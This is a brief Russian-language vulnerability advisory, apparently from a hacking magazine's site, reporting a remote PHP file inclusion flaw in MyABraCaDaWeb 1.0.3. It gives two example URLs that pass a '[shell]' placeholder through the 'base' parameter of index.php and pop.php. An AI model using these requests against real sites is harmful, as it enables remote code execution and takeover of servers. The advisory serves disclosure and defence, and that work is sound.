Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: MyABraCaDaWeb 1.0.3
Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе.
Пример:
http://www.site.com/[path]/index.php?base==[shell]
http://www.site.com/[path]/pop.php?base=[shell]